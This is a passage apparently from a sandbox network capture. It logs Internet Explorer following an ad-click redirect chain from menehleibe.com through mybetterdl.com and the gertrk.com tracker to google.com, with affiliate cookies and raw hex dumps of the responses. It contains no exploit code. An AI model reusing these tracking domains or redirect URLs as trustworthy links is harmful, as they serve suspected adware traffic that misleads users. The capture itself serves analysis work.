                                                                                                                                                                      2021-09-14 14:03:23 UTC2OUTGET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: p226681.mybetterdl.com
                                                                                                                                                                      Cookie: rhid=79630578833
                                                                                                                                                                      2021-09-14 14:03:23 UTC3INHTTP/1.1 302
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:23 GMT
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Set-Cookie: loi=ad_1007735_off_459698_aff_88561_cid_226681-MENEHLEIBE.COM_ts_1631628203; Max-Age=3600; Expires=Tue, 14-Sep-2021 15:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Location: https://gertrk.com/click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.649743168.119.139.96443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:23 UTC4OUTGET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: gertrk.com
                                                                                                                                                                      2021-09-14 14:03:23 UTC4INHTTP/1.1 302 Found
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:23 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: uclick=16bzxofy; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none
                                                                                                                                                                      Set-Cookie: uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none
                                                                                                                                                                      Location: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                      2021-09-14 14:03:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.649744168.119.139.96443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:23 UTC5OUTGET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: gertrk.com
                                                                                                                                                                      Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
                                                                                                                                                                      2021-09-14 14:03:23 UTC5INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:23 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                      2021-09-14 14:03:23 UTC6INData Raw: 33 65 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 20 68 74 74 70 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 22 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 3e<meta http-equiv="refresh" content="0;URL= http://google.com">0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.649746168.119.139.96443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:24 UTC6OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: gertrk.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
                                                                                                                                                                      2021-09-14 14:03:24 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Content-Type: image/x-icon
                                                                                                                                                                      Content-Length: 5638
                                                                                                                                                                      Last-Modified: Thu, 30 Aug 2018 21:25:42 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      ETag: "5b8860d6-1606"
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2021-09-14 14:03:24 UTC6INData Raw: 00 00 01 00 01 00 27 22 00 00 01 00 20 00 f0 15 00 00 16 00 00 00 28 00 00 00 27 00 00 00 44 00 00 00 01 00 20 00 00 00 00 00 b8 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 3b 4c e6 ff 00 00 00 00 00 00 00 00 19 c3 ef ff 19
                                                                                                                                                                      Data Ascii: '" ('D ;L;L;L;L;L;L


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.649751142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:24 UTC12OUTGET /?gws_rd=ssl HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      2021-09-14 14:03:24 UTC12INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: -1
                                                                                                                                                                      Cache-Control: private, max-age=0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                      Server: gws
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Set-Cookie: CONSENT=PENDING+509; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      2021-09-14 14:03:24 UTC13INData Raw: 33 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65
                                                                                                                                                                      Data Ascii: 34bd<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
                                                                                                                                                                      2021-09-14 14:03:24 UTC13INData Raw: 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61 2c 62 2c 63 2c 64 2c 67 29 7b 76 61 72 20 65 3d 22 22 3b 63 7c 7c 2d 31 21 3d 3d 62 2e 73 65 61 72 63 68 28 22 26 65 69 3d 22 29 7c 7c 28 65 3d 22 26 65 69 3d 22 2b 6c 28 64 29 2c 2d 31 3d 3d 3d 62 2e 73 65 61 72 63 68 28 22 26 6c 65 69 3d 22 29 26 26 28 64 3d 6d 28 64 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 64
                                                                                                                                                                      Data Ascii: ));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d
                                                                                                                                                                      2021-09-14 14:03:24 UTC14INData Raw: 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 22 31 22 3d 3d 3d 63 7c 7c 22 71 22 3d 3d 3d 63 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b
                                                                                                                                                                      Data Ascii: ){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;
                                                                                                                                                                      2021-09-14 14:03:24 UTC16INData Raw: 2b 62 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 2c 62 2c 63 2c 64 29 7b 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 69 6e 20 61 3f 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 64 7c 7c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 62 2c 63 29 7d 0a 67 6f 6f 67 6c 65 2e 72 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 66 29 7b 63 28 66 29 3b 6b 28 61 2c 22 6c 6f 61 64 22 2c 64 29 3b 6b 28 61 2c 22 65 72 72 6f 72 22 2c 64 29 7d 68 28 61 2c 22 6c 6f 61 64 22 2c 64 29 3b 62 26 26 68 28 61 2c 22 65 72 72 6f 72 22 2c 64 29 7d 3b 65 2e 67 6f 6f 67 6c 65 2e 61 66 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                      Data Ascii: +b,c)}function k(a,b,c,d){"addEventListener"in a?a.removeEventListener(b,c,d||!1):a.attachEvent&&a.detachEvent("on"+b,c)}google.rll=function(a,b,c){function d(f){c(f);k(a,"load",d);k(a,"error",d)}h(a,"load",d);b&&h(a,"error",d)};e.google.aft=function(a){
                                                                                                                                                                      2021-09-14 14:03:24 UTC17INData Raw: 65 6e 22 3d 3d 3d 63 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 29 62 72 65 61 6b 20 61 3b 63 3d 6e 75 6c 6c 7d 69 66 28 21 63 29 72 65 74 75 72 6e 21 31 3b 61 3d 62 28 61 29 3b 62 3d 62 28 63 29 3b 72 65 74 75 72 6e 20 61 2e 62 6f 74 74 6f 6d 3c 62 2e 74 6f 70 7c 7c 61 2e 74 6f 70 3e 3d 62 2e 62 6f 74 74 6f 6d 7c 7c 61 2e 72 69 67 68 74 3c 62 2e 6c 65 66 74 7c 7c 61 2e 6c 65 66 74 3e 3d 62 2e 72 69 67 68 74 7d 0a 66 75 6e 63 74 69 6f 6e 20 72 28 61 29 7b 72 65 74 75 72 6e 22 6e 6f 6e 65 22 3d 3d 3d 61 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3f 21 30 3a 64 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 26 26 64 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3f 28 61 3d 64 6f 63 75
                                                                                                                                                                      Data Ascii: en"===c.style.overflow)break a;c=null}if(!c)return!1;a=b(a);b=b(c);return a.bottom<b.top||a.top>=b.bottom||a.right<b.left||a.left>=b.right}function r(a){return"none"===a.style.display?!0:document.defaultView&&document.defaultView.getComputedStyle?(a=docu
                                                                                                                                                                      2021-09-14 14:03:24 UTC18INData Raw: 3d 3d 7a 3a 45 3d 3d 3d 46 3b 21 4b 26 26 61 26 26 67 6f 6f 67 6c 65 2e 63 2e 75 28 22 69 6c 22 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 4f 28 29 7b 69 66 28 21 4a 29 7b 76 61 72 20 61 3d 46 3d 3d 3d 45 2c 62 3d 44 3d 3d 3d 43 2c 63 3d 49 3d 3d 3d 48 3b 63 3d 67 6f 6f 67 6c 65 2e 63 2e 6e 6c 69 3f 63 3a 61 3b 69 66 28 61 26 26 62 29 7b 67 6f 6f 67 6c 65 2e 63 2e 65 28 22 6c 6f 61 64 22 2c 22 69 6d 61 22 2c 53 74 72 69 6e 67 28 45 29 29 3b 67 6f 6f 67 6c 65 2e 63 2e 65 28 22 6c 6f 61 64 22 2c 22 69 6d 61 64 22 2c 53 74 72 69 6e 67 28 47 29 29 3b 67 6f 6f 67 6c 65 2e 63 2e 65 28 22 6c 6f 61 64 22 2c 22 61 66 74 70 22 2c 53 74 72 69 6e 67 28 4d 61 74 68 2e 72 6f 75 6e 64 28 4c 29 29 29 3b 76 61 72 20 64 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 2e 6c 6f 61 64 3b
                                                                                                                                                                      Data Ascii: ==z:E===F;!K&&a&&google.c.u("il")}function O(){if(!J){var a=F===E,b=D===C,c=I===H;c=google.c.nli?c:a;if(a&&b){google.c.e("load","ima",String(E));google.c.e("load","imad",String(G));google.c.e("load","aftp",String(Math.round(L)));var d=google.timers.load;
                                                                                                                                                                      2021-09-14 14:03:24 UTC20INData Raw: 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 72 74 22 2c 22 31 22 29 2c 2b 2b 43 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 55 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 69 66 28 67 6f 6f 67 6c 65 2e 63 2e 67 69 70 26 26 62 26 26 22 47 2d 49 4d 47 22 3d 3d 3d 62 2e 74 61 67 4e 61 6d 65 26 26 28 62 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 7c 7c 62 2e 73 74 79 6c 65 2e 77 69 64 74 68 29 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 64 3d 61 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 69 66 28 63 2e 68 65 69 67 68 74 3c 3d 64 2e 68 65 69 67 68 74 7c 7c 63 2e 77 69 64 74 68 3c 3d 64 2e 77 69 64 74 68 29 72 65 74 75 72 6e 20 62 7d 72 65 74 75 72 6e 20
                                                                                                                                                                      Data Ascii: ribute("data-frt","1"),++C)}function U(a){var b=a.parentElement;if(google.c.gip&&b&&"G-IMG"===b.tagName&&(b.style.height||b.style.width)){var c=b.getBoundingClientRect(),d=a.getBoundingClientRect();if(c.height<=d.height||c.width<=d.width)return b}return
                                                                                                                                                                      2021-09-14 14:03:24 UTC21INData Raw: 6f 67 6c 65 2e 63 2e 75 62 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 62 3d 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 74 69 63 6b 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 64 63 6c 22 29 7d 5d 3b 67 6f 6f 67 6c 65 2e 64 63 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 2e 6c 65 6e 67 74 68 3f 62 2e 70 75 73 68 28 61 29 3a 61 28 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 62 2e 73 68 69 66 74 28 29 3b 61 3b 29 61 28 29 2c 61 3d 62 2e 73 68 69 66 74 28 29 7d 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c
                                                                                                                                                                      Data Ascii: ogle.c.ubr=function(){})};}).call(this);(function(){var b=[function(){google.tick&&google.tick("load","dcl")}];google.dclc=function(a){b.length?b.push(a):a()};function c(){for(var a=b.shift();a;)a(),a=b.shift()}window.addEventListener?(document.addEventL
                                                                                                                                                                      2021-09-14 14:03:24 UTC22INData Raw: 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 64 3d 4a 3b 64 2e 67 3d 61 3b 64 2e 68 3d 62 3b 72 65 74 75 72 6e 20 64 7d 3b 49 2e 70 72 6f 74 6f 74 79 70 65 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 3b 74 68 69 73 2e 67 26 26 74 68 69 73 2e 67 21 3d 74 68 69 73 2e 68 3f 74 68 69 73 2e 67 3d 74 68 69 73 2e 67 2e 5f 5f 6f 77 6e 65 72 7c 7c 74 68 69 73 2e 67 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 74 68 69 73 2e 67 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 61 7d 3b 76 61 72 20 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6a 3d 5b 5d 3b 74 68 69 73 2e 67 3d 30 3b 74 68 69 73 2e 68 3d 6e 75 6c 6c 3b 74 68 69 73 2e 6c 3d 21 31 7d 3b 4c 2e 70 72 6f 74 6f 74 79 70 65 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                      Data Ascii: ,K=function(a,b){var d=J;d.g=a;d.h=b;return d};I.prototype.i=function(){var a=this.g;this.g&&this.g!=this.h?this.g=this.g.__owner||this.g.parentNode:this.g=null;return a};var L=function(){this.j=[];this.g=0;this.h=null;this.l=!1};L.prototype.i=function(){
                                                                                                                                                                      2021-09-14 14:03:24 UTC23INData Raw: 66 28 21 6e 29 7b 6e 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 42 3d 7a 2e 73 70 6c 69 74 28 62 61 29 2c 64 61 3d 42 3f 42 2e 6c 65 6e 67 74 68 3a 30 2c 43 3d 30 3b 43 3c 64 61 3b 43 2b 2b 29 7b 76 61 72 20 77 3d 42 5b 43 5d 3b 69 66 28 77 29 7b 76 61 72 20 44 3d 77 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 2c 50 3d 2d 31 21 3d 44 2c 65 61 3d 50 3f 52 28 77 2e 73 75 62 73 74 72 28 30 2c 44 29 29 3a 22 63 6c 69 63 6b 22 3b 77 3d 50 3f 52 28 77 2e 73 75 62 73 74 72 28 44 2b 31 29 29 3a 77 3b 6e 5b 65 61 5d 3d 77 7d 7d 67 5b 7a 5d 3d 6e 7d 72 2e 5f 5f 6a 73 61 63 74 69 6f 6e 3d 6e 7d 65 6c 73 65 20 6e 3d 66 61 2c 72 2e 5f 5f 6a 73 61 63 74 69 6f 6e 3d 6e 7d 22 6d 61 79 62 65 5f 63 6c 69 63 6b 22 3d 3d 71 26 26 6e 2e 63 6c 69 63 6b 3f 28 70 3d 71 2c 71 3d 22 63 6c 69
                                                                                                                                                                      Data Ascii: f(!n){n={};for(var B=z.split(ba),da=B?B.length:0,C=0;C<da;C++){var w=B[C];if(w){var D=w.indexOf(":"),P=-1!=D,ea=P?R(w.substr(0,D)):"click";w=P?R(w.substr(D+1)):w;n[ea]=w}}g[z]=n}r.__jsaction=n}else n=fa,r.__jsaction=n}"maybe_click"==q&&n.click?(p=q,q="cli
                                                                                                                                                                      2021-09-14 14:03:24 UTC25INData Raw: 79 70 65 26 26 22 63 6c 69 63 6b 6d 6f 64 22 21 3d 68 2e 65 76 65 6e 74 54 79 70 65 7c 7c 28 63 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 63 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3a 63 2e 72 65 74 75 72 6e 56 61 6c 75 65 3d 21 31 29 2c 28 63 3d 61 2e 69 28 68 29 29 26 26 66 29 7b 6c 2e 63 61 6c 6c 28 74 68 69 73 2c 63 2c 21 31 29 3b 72 65 74 75 72 6e 7d 7d 65 6c 73 65 7b 69 66 28 28 66 3d 65 2e 64 6f 63 75 6d 65 6e 74 29 26 26 21 66 2e 63 72 65 61 74 65 45 76 65 6e 74 26 26 66 2e 63 72 65 61 74 65 45 76 65 6e 74 4f 62 6a 65 63 74 29 74 72 79 7b 76 61 72 20 45 3d 66 2e 63 72 65 61 74 65 45 76 65 6e 74 4f 62 6a 65 63 74 28 63 29 7d 63 61 74 63 68 28 6a 61 29 7b 45 3d 63 7d 65 6c 73 65 20 45 3d 63 3b 68 2e 65 76 65 6e 74 3d 45 3b 61 2e 6a
                                                                                                                                                                      Data Ascii: ype&&"clickmod"!=h.eventType||(c.preventDefault?c.preventDefault():c.returnValue=!1),(c=a.i(h))&&f){l.call(this,c,!1);return}}else{if((f=e.document)&&!f.createEvent&&f.createEventObject)try{var E=f.createEventObject(c)}catch(ja){E=c}else E=c;h.event=E;a.j
                                                                                                                                                                      2021-09-14 14:03:24 UTC26INData Raw: 31 30 34 0d 0a 56 28 61 29 3b 72 65 74 75 72 6e 20 64 7d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 61 2e 68 2e 63 6f 6e 63 61 74 28 61 2e 67 29 2c 64 3d 5b 5d 2c 63 3d 5b 5d 2c 66 3d 30 3b 66 3c 61 2e 67 2e 6c 65 6e 67 74 68 3b 2b 2b 66 29 7b 76 61 72 20 6c 3d 61 2e 67 5b 66 5d 3b 58 28 6c 2c 62 29 3f 28 64 2e 70 75 73 68 28 6c 29 2c 47 28 6c 29 29 3a 63 2e 70 75 73 68 28 6c 29 7d 66 6f 72 28 66 3d 30 3b 66 3c 61 2e 68 2e 6c 65 6e 67 74 68 3b 2b 2b 66 29 6c 3d 61 2e 68 5b 66 5d 2c 58 28 6c 2c 62 29 3f 64 2e 70 75 73 68 28 6c 29 3a 28 63 2e 70 75 73 68 28 6c 29 2c 55 28 61 2c 6c 29 29 3b 61 2e 67 3d 63 3b 61 2e 68 3d 64 7d 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 64 3d 62 2e 67 3b 61 61 26 26 28 64 2e
